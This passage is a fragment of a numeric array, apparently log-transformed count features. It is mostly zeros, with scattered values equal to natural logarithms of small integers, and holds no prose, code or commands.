0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0, 0.0, 0.0, 3.044522437723423, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.302585092994046, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.2832037287379885, 0.0, 0.0, 4.518263445217986, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 3.7376696182833684, 0, 0, 5.780743515792329, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0,\n 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 1.3862943611198906, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 3.8066624897703196, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.2626798770413155, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 1.6094379124341003, 2.833213344056216, 3.8005740880419454, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 4.02535169073515, 0, 2.1972245773362196, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 2.4849066497880004, 0, 0.0, 0.0, 3.784189633918261, 0.0, \n 2.772588722239781, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 7.613324979540639, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 6.102339570951937, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 3.0841946160253872, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, \n 0.6931471805599453, 0, 0.0, 4.182806904693496, 0.0, 0.0, 0, \n 3.5553480614894135, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 5.365976015021851, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0,\n 3.2958368660043296, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 4.06534854782536, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 2.9444389791664403, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 3.9384838577066197, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7612001156935624, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 2.833213344056216, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 1.0986122886681098, 0, 1.0986122886681098, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.605170185988092, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.147494476813453, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 